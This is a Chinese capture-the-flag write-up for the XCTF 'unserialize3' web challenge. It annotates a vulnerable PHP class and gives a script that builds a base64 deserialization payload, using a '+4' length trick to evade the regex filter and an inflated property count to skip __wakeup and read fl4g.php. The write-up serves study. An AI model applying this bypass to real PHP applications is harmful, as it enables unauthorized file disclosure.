当前位置:网站首页>攻防世界Web进阶区unserialize3题解
攻防世界Web进阶区unserialize3题解
2022-07-07 22:09:00 【B_secretary】
<?php
class Demo {
private $file = 'index.php';
//构造函数,在变量创建时自动调用,__意为魔术方法,在符合条件时会自动调用
public function __construct($file) {
$this->file = $file;
//“->”在PHP中相当于Python的“.”,用于调用对象的方法
}
//析构函数,在变量销毁时自动调用
function __destruct() {
echo @highlight_file($this->file, true);
}
//打印file中的内容,将文件显示给读者
/* highlight_file(filename,return) 函数对文件进行语法高亮显示,如果 return 参数被设置为true,那么该函数会返回被高亮处理的代码,而不是输出它们。
整段代码的意思就是当文件销毁时会输出$file的代码。at符号(@)在PHP中用作错误控制操作符。当表达式附加@符号时,将忽略该表达式可能生成的错误消息。*/
//在反序列化时会自动调用
function __wakeup() {
if ($this->file != 'index.php') {
//the secret is in the fl4g.php
$this->file = 'index.php';
}
//将文件名一律变为“index.php”
}
}
if (isset($_GET['var'])) {
/*判断变量var是否被创建,检测变量是否已设置并且非NULL,这段代码就是检测是否传递了get请求的var变量*/
$var = base64_decode($_GET['var']);
//将var解base64编码
if (preg_match('/[oc]:\d+:/i', $var)) {
//匹配var中是否有字符串
die('stop hacking!');
} else {
@unserialize($var);
//反序列化var,此时会调用wakeup函数
}
} else {
highlight_file("index.php");
//显示高亮index.php,这不是我们想要的结果
}
?>
题目源码中告诉我们flag在f14g.php中,所以我们想要进入这个文件,那么payload需要满足:
1、不含有preg_match中过滤的字符串或者直接绕过preg_match函数
2、反序列化时绕过wakeup函数
所以我们用序列化的方式构造一个var传入,让变量的value等于f14g.php,那么变量销毁时就会通过析构函数显示f14g.php
构造payload代码:
<?php
class Demo {
private $file = 'index.php';
public function __construct($file) {
$this->file = $file;
}
function __destruct() {
echo @highlight_file($this->file, true);
}
function __wakeup() {
if ($this->file != 'index.php') {
$this->file = 'index.php';
}
}
}
$payload = new Demo('fl4g.php');//创建对象Demo,其file值为f14g.php
$payload = serialize($payload);//序列化操作
$payload = str_replace('O:4', 'O:+4',$payload);
//将其中的“0:4”换成“0:+4”从而绕过正则
$payload = str_replace(':1:', ':2:' ,$payload);
//将序列化中对象个数“1”改为“2”,从而绕过wakeup函数(序列化中记录对象个数的值比对象真正个数大即可绕过wakeup)
//序列化中不可打印的空白等价于%00,到时候需要在payload中加上
echo base64_encode($payload); //对参数进行 base64 编码并打印出来
?>
边栏推荐
- Flask learning record 000: error summary
- An example analysis of MP4 file format parsing
- 【编程题】【Scratch二级】2019.12 绘制十个正方形
- Go learning notes (2) basic types and statements (1)
- Robomaster visual tutorial (11) summary
- [研发人员必备]paddle 如何制作自己的数据集,并显示。
- Kubectl 好用的命令行工具:oh-my-zsh 技巧和窍门
- 用语雀写文章了,功能真心强大!
- When creating body middleware, express Is there any difference between setting extended to true and false in urlencoded?
- Binary sort tree [BST] - create, find, delete, output
猜你喜欢
Binary sort tree [BST] - create, find, delete, output
How did a fake offer steal $540million from "axie infinity"?
光流传感器初步测试:GL9306
如何衡量产品是否“刚需、高频、痛点”
某马旅游网站开发(登录注册退出功能的实现)
[programming problem] [scratch Level 2] draw ten squares in December 2019
Connect diodes in series to improve voltage withstand
Preliminary test of optical flow sensor: gl9306
How to measure whether the product is "just needed, high frequency, pain points"
用語雀寫文章了,功能真心强大!
随机推荐
At the age of 35, I made a decision to face unemployment
The function is really powerful!
80% of the people answered incorrectly. Does the leaf on the apple logo face left or right?
10 schemes to ensure interface data security
QT and OpenGL: load 3D models using the open asset import library (assimp)
Database interview questions + analysis
Pigsty: out of the box database distribution
Database query - what is the highest data?
【编程题】【Scratch二级】2019.03 绘制方形螺旋
全自动化处理每月缺卡数据,输出缺卡人员信息
在网页中打开展示pdf文件
自动化测试:Robot FrameWork框架90%的人都想知道的实用技巧
【编程题】【Scratch二级】2019.12 绘制十个正方形
关于组织2021-2022全国青少年电子信息智能创新大赛西南赛区(四川)复赛的通知
Detailed explanation of interview questions: the history of blood and tears in implementing distributed locks with redis
QT creator add custom new file / Project Template Wizard
Codeworks 5 questions per day (average 1500) - day 8
用语雀写文章了,功能真心强大!
Connect diodes in series to improve voltage withstand
Binary sort tree [BST] - create, find, delete, output